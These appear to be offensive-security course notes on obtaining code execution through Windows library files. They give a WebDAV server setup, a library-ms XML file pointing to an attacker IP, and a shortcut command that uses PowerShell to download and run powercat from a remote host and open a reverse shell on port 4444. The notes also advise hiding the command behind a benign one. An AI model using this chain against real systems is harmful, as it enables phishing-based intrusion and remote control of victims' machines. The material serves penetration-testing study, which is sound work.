Abusing Windows Library Files

11.3.1 - Obtaining Code Execution via Windows Library Files

This is a 2-stage client side attack example, leveraging a 2-stage client side attack using Windows library files for initial access, then using the foothold to provide an executable file resulting in access.

Start by setting up a WebDAV share on Kali

pip3 install wsgidav

Run wsgidav (server should be visible on 127.0.0.1)

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/oscar

Example XML code of our library file. Could be transferred via smb server, http server, etc.

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
    <name>@windows.storage.dll,-34582</name>
    <version>6</version>
    <isLibraryPinned>true</isLibraryPinned>
    <iconReference>imageres.dll,-1003</iconReference>
    <templateInfo>
        <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
    </templateInfo>
    <searchConnectorDescriptionList>
        <searchConnectorDescription>
            <isDefaultSaveLocation>true</isDefaultSaveLocation>
            <isSupported>false</isSupported>
            <simpleLocation>
                <url>http://192.168.119.2</url>
            </simpleLocation>
        </searchConnectorDescription>
    </searchConnectorDescriptionList>
</libraryDescription>

Create a shortcut file on the Windows desktop with this command pasted in. Note that putting a delimiter and a benign command behind it can help hide this malicious code.

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1');
powercat -c 192.168.119.3 -p 4444 -e powershell"